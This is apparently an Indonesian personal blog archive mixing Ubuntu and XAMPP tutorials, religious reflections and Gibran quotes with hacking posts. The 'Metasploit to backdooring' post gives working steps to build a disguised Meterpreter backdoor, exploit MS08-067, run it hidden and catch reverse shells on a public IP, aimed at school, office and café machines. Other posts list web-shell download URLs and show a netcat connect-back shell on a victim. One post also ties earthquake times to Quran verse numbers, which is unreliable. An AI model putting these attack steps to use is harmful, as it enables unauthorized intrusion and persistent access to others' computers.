Mas Fitri

Tutup Buku

2010-05-21T17:13:00.002+07:00

Maaf sodara-sodara, untuk beberapa saat ini mungkin blog ini tidak update lagi.Mohon maaf mungkin rekan2 kurang nyaman.. terimakasih bagi rekan2 yang bersedua komen2, kasih kritik, saran ide juga.

sementara blog yang dapat update http://usersonly.wordpress.com

salam,
xiNux3r

Gempa dan Al Qur'an

2009-10-02T22:32:00.001+07:00

Sungguh sangat menyentuh hati jika kita menyimak lebih dalem tentang bencana yg terus menerus melanda negeri ini.Ada baiknya kita mulai belajar dan memahami apa arti di balik semua ini. Ya Allah, berikan kami perlindungan atas segala adzab dan siksa, tuntunlah kami ke Jalan MU ya ALLAH. Jalan yang lurus dan jalan orang-orang yang Allah beri Nikmat. dan bukan jalan orang-orang yang Sesat. Sadarkan kami dan negeri ini ya Allah.

Kejadiannya jam 17.16 wib yahh.. coba deh buka Alquran surat 17 ayat 16
yakni
Al-Isra ayat 16 :"Dan jika Kami hendak membinasakan suatu negeri, maka Kami perintahkan kepada orang-orang yang hidup mewah di negeri itu (supaya mentaati Allah) tetapi mereka melakukan kedurhakaan dalam negeri itu, maka sudah sepantasnya berlaku terhadapnya perkataan (ketentuan Kami), kemudian Kami hancurkan negeri itu sehancur-hancurnya.'

trus kan ada gempa susulan jam 17.38
coba aja liat Al-Isra surat 38:"Semua itu kejahatannya amat dibenci di sisi Tuhanmu."

kalo di Jambi gempanya jam 8.52 wib
nah isi dari surat al-Anfal ayat 52 (QS 8:52) yakni: "(Keadaan mereka) serupa dengan keadaan Firaun dan pengikut-pengikutnya serta orang-orang yang sebelumnya. Mereka mengingkari ayat-ayat Allah, maka Allah menyiksa mereka disebabkan dosa-dosanya. Sesungguhnya Allah Maha Kuat lagi Amat Keras siksaan-Nya."

Allah tried to remind us.......... Subhanallah
semoga dengan pertanda ini kita menjadi muslim yang lebih baik.. aminn

Metasploit to backdooring

2009-05-11T14:26:00.003+07:00

May already have some of the metasploit that can be used to create a backdoor.
Use of this backdoor is very useful, especially as post-Exploitation method. At the time this example we will use the 2 basic methods to get the shell from the target, namely bind_tcp and reverse_tcp.
To bind_tcp, akan backdoor running on the target terget akan open the port on the system itself. So that after the exploitation process is complete, we can enter at any time to the target by using the port has been opened by the backdoor.


$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread

Backdoor will open a port on the 4321 target 10.10.96.143. How is the process running up to our backdoor, backdoor can be planted and executed after the process is complete exploitation of the target as follows:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading  : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded   : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.

At the next time, we can go to the target machine without doing exploitation back, simply by opening the connection on the port that has been defined next.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >

Second method uses reverse shell, reverse shell is used especially when the target network is limited by the firewall so that it can not open a connection to any port (typical internal network). So if you have the opportunity for hacking to a machine in the internal network (eg: computer school, computer office, computer cafe, etc) and still want to get shell access at any time and anywhere can take advantage of multi-handler to accept metasploit reverse shell. We can setup a multi-handler in the machinery that can be accessed from anywhere on the internet, for example: hosting machine, or server engine results rampokan, etc..


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description 
   ----  ---------------  --------  ----------- 


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description                         
   ----      ---------------  --------  -----------                         
   EXITFUNC  seh              yes       Exit technique: seh, thread, process 
   LHOST                      yes       The local address                   
   LPORT     4444             yes       The local port                       


Exploit target:

   Id  Name           
   --  ----           
   0   Wildcard Target 


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler..

Then create a backdoor to live with reverse_shell category:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

And when the run (run through the post-session exploitation or run manually via double-click the mouse razz), on a multi-handler will appear:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >

Wow, using a multi-handler metasploit is we can have multiple sessions at once, for the above example can be seen a multi-handler that has been set ExitOnSession == false reverse_shell can menghandle many at once. And we can interact with the session-session at any time we want to:


msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel                             
  --  -----------  ------                             
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831 
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836 
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838 
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840 
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845 
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846 
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847 

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS      : Windows XP (Build 2600, ).

That is some of the metasploit for example backdooring, many examples of other creative kiddies, especially the smell and evil-in-mind. Oh yes, in the example above I use the payload meterpreter many times. The discussion about meterpreter akan do next.
-----
thank'to:
echo, xcode, jasakom, mildnet, newhack etc..

copyleft@echo.or.id

PHP Shell

2009-05-11T13:08:00.000+07:00

Why is it that we have a site that we can hack the remote? Perhaps one of the few activities we can do with exploitation or remote file / server with shell code.
hmm, the following shell code for exploitation that may be used.

http://allplayoffs.com/~willboar/c100.php
-----------
http://asiahardon.com/~willboar/c100.php
-----------
http://ygbai.com/~willboar/c100.php
-----------
http://4-phonecard.com/~willboar/c100.php
-----------
http://afilmase.com/~willboar/c100.php
-----------
http://allplayoffs.com/~willboar/c100.php
-----------
http://asiahardon.com/~willboar/c100.php
-----------
http://afilmase.com/~willboar/c100.php
-----------
http://ygbai.com/~willboar/c100.php
-----------
http://4-phonecard.com/~willboar/c100.php
-----------
http://xxxwebreview.com/~willboar/c100.php
-----------
http://www.shellc0der.com/c100.txt
-----------
http://www.shellc0der.com/c99.txt
-----------
http://www.shellc0der.com/r57.txt
-----------
http://www.shellc0der.com/r58.txt
-----------
http://www.shellc0der.com/phpshell.txt
-----------
http://www.shellc0der.com/c99v2.txt

Membuat Repository lokal Ubuntu Linux

2009-02-03T16:27:00.000+07:00

Anda pengguna Ubuntu Linux? paket-paket default yang hadir bersama CD instalasi terasa sangat kurang terutama jika anda ingin melakukan banyak hal misalnya mendengarkanMP3, memutar movie berformat avi dan mengekstrak file berekstensi .rar. Jika anda punya koneksi Internet bagus dan murah…ini bukan masalah. Segala kekurangan dapat diupdate secara otomatis oleh Ubuntu…menghubungkan desktop anda ke server repository ubuntu di Internet.

Ubuntu 8.04 seperti yang saya gunakan mempunyai 5 DVD (sekitar 20 GB) repository yang dapat dikatakan lengkap. Mau apa pun hampir 100 % ada..hampir lho. Update MP3 player? bisa..mau instal tool untuk programming? bisa…tinggal pilih bahasa dan tool apa yang anda mau? Java, C++ (ini mah umum banget), Visual Basic (GAMBAS), Delphi (Lazarus), Pascal (Free Pascal)…semua ada.

Jika anda nggak punya koneksi bagus dan murah ke Internet…anda dapat membuat server repo lokal. Bagusnya sih..lab di Kampus punya server ini dan setiap client dapat mengaksesnya. Langkah-langkah di bawah ini ditujukan untuk membuat repository lokal dari file ISO 5 DVD Ubuntu 8.04 …jadi ISO tersebut tidak perlu di burn ke DVD-ROM. Kalo mau dibuat sebagai server…taruh ajah di direktori file-file web server atau FTP server:

Melalui Synaptic Package Manager:
1. Buka menu: System > Administration > Software Resouces
2. Pilih tab “Third-Party Software”
3. Pilih “Add”
4. Masukkan baris pertama pada salah satu server repositori pada daftar di atas. Misalnya:
deb http://mugos.ums.ac.id/pub/ubuntu hardy main restricted universe multiverse
6. Klik “Add” lagi, lalu isikan baris berikutnya. Lakukan langkah ini hingga semua baris pada server tersebut selesai anda masukkan.
7. Setelah selesai, centang setiap item pada daftar “Third-Party Software”
8. Klik “Close”
9. Klik “Reload” pada ikon di sebelah kiri atas

Melalui terminal:

1. Masukkan perintah berikut:
sudo gedit /etc/apt/sources.list

2. Hapus seluruh baris pada file ini dan ganti dengan baris-baris pada salah satu server dari daftar di atas. Contoh:
deb http://mugos.ums.ac.id/pub/ubuntu Hardy main multiverse restricted universe
deb http://mugos.ums.ac.id/pub/ubuntu Hardy-security main multiverse restricted universe
deb http://mugos.ums.ac.id/pub/ubuntu Hardy-updates main multiverse restricted universe

3. Melalui terminal, masukkan perintah berikut:
sudo apt-get update

berikut ini alamat server tersebut :

UMS
deb http://mugos.ums.ac.id/pub/ubuntu/ hardy main restricted universe multiverse
deb http://mugos.ums.ac.id/pub/ubuntu/ hardy-updates main restricted universe multiverse
deb http://mugos.ums.ac.id/pub/ubuntu/ hardy-security main restricted universe multiverse

ITS
deb http://mirror.its.ac.id/ubuntu hardy main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-security main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-backports main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-updates main multiverse restricted universe

Kambing
deb http://kambing.ui.edu/ubuntu hardy main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-updates main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-security main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-backports main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-proposed main restricted universe multiverse

mirror.cbn.net.id (OpenIXP)
deb http://ubuntu.cbn.net.id/Ubuntu hardy main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-updates main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-security main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-backports main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-proposed main restricted universe multiverse

komo.vlsm.org
deb http://komo.vlsm.org/ubuntu hardy main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-updates main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-security main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-backports main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-proposed main restricted universe multiverse

ITB
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-updates main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-security main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-backports main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-proposed main restricted universe multiverse

FOSS
deb http://dl2.foss-id.web.id/ubuntu hardy main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-updates main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-security main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-backports main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-proposed main restricted universe multiverse

mirror.unej.ac.id
deb http://mirror.unej.ac.id/ubuntu hardy main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-updates main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-security main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-backports main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu hardy-proposed main restricted universe multiverse

------------------
Referensi:
http://solo.foss-id.web.id/
http://komputasi.wordpress.com/

Install Winamp Plugin in AIMP

2009-02-02T21:25:00.000+07:00

Installing Winamp Plugins In AIMP
Posted by Martin in Music and Video, software Tags: aimp, aimp plugins, aimp2, mp3-player, music, music player, music software, winamp, winamp plugins

If you look around and ask your friends which media player they prefer you will most likely come up with many different answers. Winamp, Windows Media Player and iTunes will surely be on the top of the list with lesser known players mentioned by some of the friends. Most are perfectly happy that they can play music on their computer without having to think about configuring the service first or tweaking it for maximum effectiveness.

AIMP is a music player that might not be mentioned that often. The main reason why that is the case is surely the Russian website that is keeping lots of users at bay. Some might spot the player on download portals like Softpedia and those are usually the ones who stick with it after installing and testing the player.

AIMP comes with an impressive design and functionality that leaves most music players behind. It is low on resource usage, provides an impressive sound, great design, an audio converter, CD ripper and Internet radio ripper among other things.

The official website contains a few plugins and skins that can be added to the player but one feature that the player excels in is the compatibility to many Winamp plugins.

One of the winners of a Ghacks t-shirt mentioned a few Winamp plugins that were keeping him from changing to AIMP. A quick research revealed that it was possible to add the plugins to AIMP as well. He mentioned the following three plugins: Minilyrics, DFX and Ozone.

The principle is basically the same for all plugins:

* Download the plugin to the computer.
* Try to extract it using a packer. If that is not working install it. All three plugins could be installed without having Winamp installed. Some might require Winamp though.
* Go to the directory where the files have been extracted / installed into.
* It is usually enough to copy the plugin dll files to the AIMP2/plugins directory. In the case of DFX it is the dsp_dfx.dll, for Ozone it is dsp_iZOzoneFree.dll while Minilyrics requires two: gen_MiniLyrics.dll and MiniLyrics.dll

A rule of thumb. If in doubt copy all files into the directory. AIMP will tell you if something is missing upon activation of the plugin. This is how you do that:

A click on the top left icon will display a menu. Choosing plugins from that menu will open the AIMP Plugin Manager which displays all loaded (meaning active) and unloaded plugins.

New plugins that have been placed in the plugins folder can be activated by selecting them with a left click and clicking on Load afterwards. You will see a message window if something is not right. If the wrong dll has been moved into the plugin directory no plugin will be shown under the Unloaded Plugins tab.

Some plugins, like the DSP ones, require activating in the options of AIMP. A click on the same icon that brought you into the Plugin Manager will also bring you in the DSP Manager. There you can select the Winamp DSP Plugin that has been previously loaded into AIMP.

Not all plugins will work but many will. It is just a matter of trying.

References
http://www.ghacks.net/2008/10/13/installing-winamp-plugins-in-aimp/

Tutorial Hacking Netcat

2009-01-26T13:24:00.000+07:00

Mengutip bagian history pada Manual Netcat atau disingkat "nc"

"The nc utility, a "damn useful little backend utility" begun 950915 or thereabouts, as *Hobbit*'s first real stab at some sockets programming. Something that should have and indeed may have existed ten years ago, but never became a standard Unix utility. IMHO, nc could take its place right next to cat, cp, rm, mv, dd, ls, and all those other cryptic and Unix-like things."

Hacker Administrator sepertinya senang sekali menggunakan tool yang satu ini untuk melakukan scanning, koneksi port, bahkan melakukan tranfer informasi antar host.

Untuk memperolehnya, Anda dapat mendownload netcat dari website packetstormsecurity.org atau FTP mirror berikut:

* ftp://coast.cs.purdue.edu/pub/tools/unix/netutils/netcat/
* ftp://ftp.cuhk.edu.hk/pub/packages/security/purdue/netutils/netcat/

Saya tidak akan membahas lebih lanjut mengenai bagaimana menginstal netcat pada sistem Anda karena ada banyak sekali manual yang tersebar di Internet tentang bagaimana mengkompail atau memperoleh binary netcat yang sesuai. Dan pada tulisan ini, saya mengkhususkan penggunaan netcat pada environment
spesifik: UNIX.

Secara sederhana, penggunaan netcat mirip dengan sebuah Telnet client, karena netcat dapat mengakses remote host mana saja dengan port apa saja (pada protokol TCP dan UDP). Sebagai contoh: untuk connect ke sebuah host bernama dubyadubya.org pada port 80, Anda cukup mengeksekusi command:

$ nc dubyadubya.org 80
Lalu tekan CTRL + C untuk exit. Jika port yang dituju terbuka, Anda dapat memberikan perintah yang Anda inginkan. Seperti:

$ nc dubyadubya.org 80
GET / HTTP/1.0 [ENTER]
[ENTER]
HTTP/1.1 200 OK
Date: Sat, 30 Apr 2005 03:29:21 GMT
Server: Apache/1.3.33 (Darwin) PHP/4.3.10
Connection: close
Content-Type: text/html
...
Netcat juga dapat digunakan sebagai tool untuk melakukan testing sebuah firewall. Yang menjadi tujuan testing adalah mencari tahu ports yang berstatus OPEN dan LISTENING.

Netcat Command Options
Sebelum lebih jauh membahas contoh penggunaan netcat, ada baiknya jika kita membahas satu-per-satu option yang tersedia dari program tersebut.
-g := gateway Tentukan source routing hop untuk koneksi-koneksi outbound.

-G := number Digunakan untuk memberikan spesifikasi source routing pointer dalam IP header.. value: 4, 8, 12, ...

-i := seconds Menentukan delay interval pengiriman packets. Sebagai contoh, jika Anda ingin netcat menunggu 5 detik untuk scanning ports, gunakan -i 5

-l := Listen mode. Jika digunakan dengan options tambahan, maka sangat dimungkinkan untuk melakukan binding ke sebuah root shell.

-n := Tidak menggunakan DNS support dan hanya menggunakan IP address saja. Sangat berguna jika DNS Anda seringkali 'lambat' dan 'bermasalah'

-o := file Membuat format hex-dump traffic ke sebuah file

-p := value Sebuah option untuk melakukan port spoofing. Jika Anda ingin sebuah packet tampak terkirim dari port 53 dari sebuah host, maka Anda akan menggunakan -p 53.

-r := Memungkinkan netcat untuk melakukan random scanning ports.

-s := address Melakukan spoofing source address dari packet. Option ini tidak dapat bekerja pada semua sistem.

-u := Secara default, netcat menggunakan protokol TCP. Dengan menggunakan option ini, netcat akan menggunakan User Datagram Protocol (UDP).

-v := Verbose mode. Gunakan -v -v untuk mendapatkan informasi yang lebih banyak.

-w := seconds Membuat netcat menunggu (dalam detik) untuk setiap respon port. Option ini biasanya dikombinasikan dengan option -z

-z := Juga disebut "zero-I/O mode", option ini memungkinkan netcat tidak menggunakan I/O dari source system. Option ini biasanya digunakan ketika memanfaatkan netcat sebagai scanner.

Examples:
Secara sederhana, untuk melakukan koneksi ke remote host, gunakan

$ nc [-options] hostname port[s] [ports] ...

sedangkan untuk listen pada koneksi inbound, gunakan

$ nc -l -p port [-options] [hostname] [port]

Sekarang, kita akan menggunakan netcat sebagai tool untuk melakukan pengecekan terhadap sebuah remote host. Jika Anda menginginkan scanning pada port 1 sampai 1024, maka perintah yang diberikan adalah

$ nc -z -w 5 -n -v 234.56.78.9 1-1024
(UNKNOWN) [234.56.78.9] 631 (?) open
(UNKNOWN) [234.56.78.9] 113 (?) open
(UNKNOWN) [234.56.78.9] 80 (?) open
(UNKNOWN) [234.56.78.9] 25 (?) open

Gunakan double verbose (-v -v) untuk mendapatkan informasi tentang ports yang tertutup (refused)...

(UNKNOWN) [234.56.78.9] 5 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 4 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 3 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 2 (?) : Connection refused
(UNKNOWN) [234.56.78.9] 1 (?) : Connection refused

Option -z dan -w 5 digunakan agar netcat tidak melakukan binding sebuah port dan menunggu lima detik untuk setiap koneksi. Option -n digunakan untuk tidak memanfaatkan fitur DNS resolve.

Untuk target ports, Anda dapat melakukan pembatasan hanya pada port tertentu saja.

$ nc -z -w 5 -n -v 234.56.78.9 21-25, 53, 80, 110-113, 443

Anda dapat melakukan scanning UDP ports dengan menambahkan option -u

$ nc -u -z -v -n 234.56.78.9 1-65335
(UNKNOWN) [234.56.78.9] 69 (?) open
(UNKNOWN) [234.56.78.9] 514 (?) open
(UNKNOWN) [234.56.78.9] 53 (?) open

------| Advanced Examples

Pada penggunaan tingkat lanjut, netcat juga dapat digunakan sebagai tool untuk melakukan transfer file. Sebagai contoh: Anda ingin melakukan copy-transfer sebuah direktori dari host-A ke host-B. Maka yang perlu Anda lakukan adalah:

pada host-A

$ tar cvf - direktori/ | nc host-B 12345

pada host-B

$ nc -l -p 12345 | tar xvf

Anda juga dapat mengunakan netcat sebagai connect-back backdoor. :-) pada host-A, aktifkan 2 window dimana netcat dijalankan dengan LISTEN mode.
$ nc -l -p 12345 [ window-1 ]
$ nc -l -p 12346 [ window-2 ]

pada host-B (yang menjadi victim)

$ nc -v host-B 12345 | /bin/sh | nc -v host-B 12346

Pada window-1 di host-A, Anda dapat mengetikkan perintah yang akan dijalankan pada host-B, dan kemudian melihat output dari perintah yang diberikan pada window-2 di host-A.

Penutup

Netcat layaknya sebuah Swiss Army Knife, dapat menjadi tool yang sangat bermanfaat bagi mereka pada network administrator. Namun tool ini juga dapat menjadi boomerang jika dimanfaatkan oleh mereka yang punya niatan tidak baik pada resource yang kita miliki.

Referensi

[1] Hobbit, "nc (netcat) - use network sockets from the command line," Netcat Manual, 1995.

Hardisk gagal Mount Linux Ubuntu

2009-01-21T14:29:00.000+07:00

Bismillah
Assalamu'alaikum Wr Wb

Melelahkan.. Akhir-akhir ini banyak banget tugas kuliah, satu baru dikerjain..eh, masuk mata kuliah ini trus ada lagi tugas. Bikin penat neh pikiran. Mau buka hardisk.... ealah dasar nasib :(, mana gagal di mount. Tp tenang bro, klu aku mungkin susah untuk putus asa begitu saja..ooops..(sok2an neh...heheh). Emang hidup itu jangan cuma dipikirin tapi juga di jalanin. Ya, Intinya jangan bilang gak mampu sebelum berusaha dan mencoba, kalu menyerah..bah, itu orang paling males di dunia..!!!(menurut saya lho ya... ^_^)

oke langsung saja sama inti masalahnya..
Yang pertama:
Saya masuk ubuntu(login) trus saya coba mount hardisk saya. tp ternyata gak bisa n ada pesan "Cannot mount volume. Unable to mount the volume 'data pribadi' ".

untuk solusi masalah ini, kawan sekalian dapat membuka "Details".nya.
Saya gunakan perintah sebagai berikut:
./buka aplikasi terminal yang ada di Applications >> Aksesoris >> Terminal
./masuk / login sebagai root dengan perintah berikut dan masukkan password root kawan (jika diminta)

fitri-ariyanto@n3wb13:~$ sudo -i

./buat direktori pada lokasi

root@n3wb13:~# mkdir /media/data

./kemudian langkah terakhir mount-kan hardisk kawan

root@n3wb13:~# mount -t ntfs-3g /dev/sdaX /media/master -o force

ctt:pada baris perintah /dev/sdaX, tergantung sda/hda mana yang pengin kewan mount. Dalam hal ini hardisk saya sda5, lengkapnya seperti ini:
"mount -t ntfs-3g /dev/sda5 /media/master -o force" (tanpa kutip).

lakukan hal yang sama pada hardisk lainya jika gagal di mount-kan.

Sampe disini tutorial berakhir.
Ada kurang dan lebihnya mohon maaf ya..

salam,

fitri-ariyanto a.k.a b'jo

Wassalamu'alaikum Wr Wb

Install XAMPP in Ubuntu Linux

2009-01-19T13:08:00.000+07:00

Bismillahirrohman nirrohim
Assalamu'alaikum Warrahmatullahi Wabarakatuhu

Pusing juga memikirkan tugas-tugas kuliah akhir-akhir ini, hufff banyak banget bro... :(, tp untuk apa dipikirin!! yang jelas tuh ditindak lanjutin gak cuma dipikir terus! ya ga ? hehehe.. mana mu selesai kalau cuma dipikir.. kamu tu jadi orang......(ah...udah, malah brantem sendiri ntar...hihih) ok kita lanjutkan tutorialnya.
Yang ini bahasanya serius lho ya..

Berikut aplikasi XAMPP linux atau lebih dikenal LAMPP yang terdiri dari:
(Apache 2.2 + MySQL 5.1 + PHP 5.2 + PERL 5.10 +PEAR + SQLite + ProFTPD + phpMyAdmin + Webalizer + phpSQLiteAdmin + XAMPP Control Panel)

http://www.ubuntuforums.org/223410
http://www.apachefriends.org/f/viewtopic.php?t=21531#108517

Untuk memulai Instalasi paket XAMPP, pertama jalankan aplikasi:
Applications -> Accessories -> Terminal

Download paket XAMPP dari alamat ini: http://apachefriends.org/xampp-linux
fitri-ariyanto@n3wb13:~$ wget http://www.apachefriends.org/download.php?xampp-linux-1.7.tar.gz

Kemudian extract paket XAMPP:
fitri-ariyanto@n3wb13:~$ sudo tar -zxvf xampp-linux-1.7.tar.gz -C /opt

Membuat shortcut XAMPP pada Start Menu:
fitri-ariyanto@n3wb13:~$ cd ~/.local/share/applications

Buat file dengan text editor kesukaan anda(nano,gedit,pico,dll) saya gunakan GEDIT .. :P, ketikkan perintah berikut:
fitri-ariyanto@n3wb13:~$ gedit xampp-control-panel.desktop

Silahkan kopas code berikut ke dalam file tersebut:
[Desktop Entry]
Comment=Start/Stop XAMPP
Name=XAMPP Control Panel
Exec=gksudo /opt/lampp/share/xampp-control-panel/xampp-control-panel
Icon[en_CA]=/opt/lampp/htdocs/favicon.ico
Encoding=UTF-8
Terminal=false
Name[en_CA]=XAMPP Control Panel
Comment[en_CA]=Start/Stop XAMPP
Type=Application
Icon=/opt/lampp/htdocs/favico.ico

Simpan dan keluar editor.

Untuk publikasi dokumen HTML:
XAMPP menggunakan /opt/lampp/htdocs sebagai ROOT direktory, tapi kita juga dapat membuat direktori publikasi dokumen pada user kita (tidak pada ROOT).
Ikuti langkahnya:
fitri-ariyanto@n3wb13:~$ cd ~
fitri-ariyanto@n3wb13:~$ mkdir public_html
fitri-ariyanto@n3wb13:~$ sudo ln -s ~/public_html /opt/lampp/htdocs/$USER

NB:Pada script "$USER", berikan nama sesuai nama user account yang anda gunakan, dalam hal ini saya menggunakan nama saya sendiri :D.
fitri-ariyanto@n3wb13:~$ sudo ln -s ~/public_html /opt/lampp/htdocs/fitri-ariyanto

Sekarang semua file atau dokumen yang ada pada ~/public_html, akan ditampilkan oleh webserver.

Memulai XAMPP / menjalankan layanan atau service:
fitri-ariyanto@n3wb13:~$ cd /opt/lampp
fitri-ariyanto@n3wb13:~$ sudo ./lampp start

atau dapat diakses dari XAMPP Control Panel yang telah kita buat tadi:
fitri-ariyanto@n3wb13:~$ Applications -> Lainnya -> XAMPP Control Panel

Sebagai defaultnya PHP5, tetapi kita juga dapat menggunakan PHP yang lain jika kita inginkan:
fitri-ariyanto@n3wb13:~$ cd /opt/lampp
fitri-ariyanto@n3wb13:~$ sudo ./lampp php4
fitri-ariyanto@n3wb13:~$ sudo ./lampp php5

Buka webbrowser dan ketikkan:
http://localhost/usernameanda/

Sekuriti / keamanan:
http://apachefriends.org/xampp-linux/381

Untuk mengkonfigurasi keamanan pada XAMPP:
fitri-ariyanto@n3wb13:~$ cd /opt/lampp
fitri-ariyanto@n3wb13:~$ sudo ./lampp security

XAMPP dan LAMPP tidak dapat berjalan sementara waktu. untuk mengatasinya kita STOP dahulu servicenya dan kita START lagi agar berjalan normal.

catatan:
~/public_html sama dengan /home/fitri-ariyanto/public_html/ dimana lokasi folder public_html berada.

Sekian tutorial dari saya, ada kurangnya silahkan kasih komentar, ada lebihnya silahkan jangan kasih komentar! :D, karena pujian hanya akan membuat kita buta dengan kebanggaan. Tp ga pa ding...hehhe

Terimakasih telah mau mampir di blog yang sederhana ini. Semoga ilmu ini bermanfaat bagi anak bangsa.

Wassalamu'alaikum Warrahmatullahi Wabarakatuhu.

Kata Mutiara-2-Kahlil Gibran

2008-12-31T14:24:00.000+07:00

"...pabila cinta memanggilmu... ikutilah dia walau jalannya berliku-liku... Dan, pabila sayapnya merangkummu... pasrahlah serta menyerah, walau pedang tersembunyi di sela sayap itu melukaimu..." (Kahlil Gibran)

"Jika manusia kehilangan sahabatnya, dia akan melihat sekitarnya dan akan melihat sahabat-sahabatnya datang dan menghiburnya... Akan tetapi apabila hati manusia kehilangan kedamaiannya, dimanakah dia akan menemukannya, bagaimanakah dia akan bisa memperolehnya kembali?" (Kahlil Gibran)

"...kuhancurkan tulang-tulangku, tetapi aku tidak membuangnya sampai aku mendengar suara cinta memanggilku dan melihat jiwaku siap untuk berpetualang" (Kahlil Gibran)

"Tubuh mempunyai keinginan yang tidak kita ketahui. Mereka dipisahkan karena alasan duniawi dan dipisahkan di ujung bumi. Namun jiwa tetap ada di tangan cinta... terus hidup... sampai kematian datang dan menyeret mereka kepada Tuhan..." (Kahlil Gibran)

"Jangan menangis, Kekasihku... Janganlah menangis dan berbahagialah, karena kita diikat bersama dalam cinta. Hanya dengan cinta yang indah... kita dapat bertahan terhadap derita kemiskinan, pahitnya kesedihan, dan duka perpisahan" (Kahlil Gibran)

"Aku ingin mencintaimu dengan sederhana... seperti kata yang tak sempat diucapkan kayu kepada api yang menjadikannya abu... Aku ingin mencintaimu dengan sederhana... seperti isyarat yang tak sempat dikirimkan awan kepada hujan yang menjadikannya tiada..." (Kahlil Gibran)

